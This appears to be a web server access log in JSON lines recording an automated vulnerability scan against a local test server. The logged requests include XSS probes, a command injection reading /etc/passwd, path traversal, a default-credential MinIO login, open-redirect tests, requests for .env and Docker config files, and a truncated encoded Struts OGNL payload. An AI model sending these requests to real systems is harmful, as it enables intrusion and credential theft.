+{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dockercfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /controller/registry-clients HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.docker/config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.composer/composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/composer/installed.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75